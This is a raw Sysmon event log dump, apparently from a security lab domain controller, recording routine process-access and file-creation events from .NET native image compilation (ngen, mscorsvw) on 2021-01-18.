13:49:06.199{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2B03-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.184{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2B03-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.184{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2B03-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:06.027{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a20-0\WindowsBase.dll2021-01-18 13:49:06.027 10341000x80000000000000007469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.590{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.574{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.574{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.074{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D3-6005-2F03-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.059{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D3-6005-2F03-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:07.059{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D3-6005-2F03-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:06.996{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1380-0\System.Xml.Linq.dll2021-01-18 13:49:06.996 10341000x80000000000000007483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.449{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.434{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.434{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.293{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3303-00000000A301}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.277{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3303-00000000A301}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.277{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3303-00000000A301}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:08.215{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1130-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-01-18 13:49:08.215 10341000x80000000000000007476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.152{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.137{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.137{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3203-00000000A301}4400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D4-6005-3103-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.090{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D4-6005-3103-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:08.090{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D4-6005-3103-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:08.012{59A5CD1D-91D3-6005-3003-00000000A301}1200C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4b0-0\System.Runtime.WindowsRuntime.dll2021-01-18 13:49:08.012 11241100x80000000000000007484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:09.934{59A5CD1D-91D4-6005-3403-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1324-0\System.Runtime.Serialization.dll2021-01-18 13:49:09.934 10341000x80000000000000007487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:10.059{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D6-6005-3503-00000000A301}1556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 